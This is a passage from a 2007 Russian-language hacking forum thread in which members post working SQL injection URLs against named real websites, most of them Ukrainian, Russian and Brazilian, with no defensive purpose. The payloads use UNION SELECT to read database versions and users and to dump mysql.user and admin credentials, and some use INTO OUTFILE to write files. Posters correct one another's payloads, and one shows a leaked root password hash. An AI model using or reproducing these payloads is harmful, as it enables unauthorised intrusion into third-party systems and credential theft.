ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1761  
Старый 08.04.2007, 20:35
Аватар для Fr-Ron
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

Tut.by
Огроменный портал...

Цитата:
http://catalog.tut.by/list.phtml?form[catid]=8+union+select+1,2,3,4,5,6,7,8,9,10/*
Очевидно, юзеры в другой БД, имя которой я пока не угадал =(

___________

Таблиц не подобрал.

Цитата:
http://www.extremeua.com/index.php?lang=rus&c=4&base=RockArea&id=3+union+se lect+1,2,3,4,5,6,7

Последний раз редактировалось Fr-Ron; 08.04.2007 в 21:43..
 
Ответить с цитированием

  #1762  
Старый 08.04.2007, 20:57
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,char(58),password)%20from%20mysql.user/*
устал подберать количество столбцов . . .
 
Ответить с цитированием

  #1763  
Старый 08.04.2007, 21:07
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+information_schema.tables+limit+16,1/*
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+information_schema.tables+limit+168,1/*
 
Ответить с цитированием

  #1764  
Старый 08.04.2007, 21:46
Аватар для ShadOS
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Цитата:
Сообщение от KPOT_f!nd  
Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,char(58),password)%20from%20mysql.user/*
устал подберать количество столбцов . . .
Зато мы подобрали. Ты немного переборщил. Вот как надо:
Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,password,user,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mysql.user%20limit+0,1+INTO+OUTFILE+'test'/*
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
 
Ответить с цитированием

  #1765  
Старый 08.04.2007, 22:13
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Код:
http://www.ipsnotizie.it/nota.php?idnews=-619+union+select+1,2,concat(database(),char(58),user(),char(58),version())/*
 
Ответить с цитированием

  #1766  
Старый 08.04.2007, 22:32
Аватар для Fr-Ron
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

Web studio... Блин, свой сайт до ума не доведут, но под заказ от 200 у.е. - пожалуйста...
К mysql.user доступ закрыт, но мож кто-то таблиц найдет каких =)

Цитата:
http://www.mg-portal.com.ua/index.php?st=0&lang=0&id=50+union+select+1,2,3,con cat(version(),char(58),char(58),char(58),user()),5
 
Ответить с цитированием

  #1767  
Старый 08.04.2007, 22:33
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от ShadOS  
Зато мы подобрали. Ты немного переборщил. Вот как надо:
Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,password,user,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mysql.user%20limit+0,1+INTO+OUTFILE+'test'/*
ты все перепутал запись в файл делается так
select+1,2,3,4,5,'тут данные которые будут записаны в файл'+from+mysql.user+into+outfile+'а тут папка куда записать'/*
 
Ответить с цитированием

  #1768  
Старый 08.04.2007, 22:39
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

www.radiobras.gov.br

Уже и бразилия =\

Код:
http://www.radiobras.gov.br/materia_i_2004.php?materia=-258494+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),10,11,12,13,14+from+mysql.user/*
кажись так :

root:6578c02369b5e3a9
 
Ответить с цитированием

  #1769  
Старый 08.04.2007, 22:44
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

Код:
http://personal.in.ua/article.php?ida=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
Код:
http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,user(),3,4/*&cy=&cm=
 
Ответить с цитированием

  #1770  
Старый 08.04.2007, 22:47
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от Goudini  
Код:
http://personal.in.ua/article.php?ida=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
Код:
http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,user(),3,4/*&cy=&cm=
Код:
http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,concat(login,char(58),pwd),3,4+from+admins/*&cy=&cm=
а вот и админский акк /me пока ее ищет

Последний раз редактировалось }{0TT@БЬ)Ч; 08.04.2007 в 22:50..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ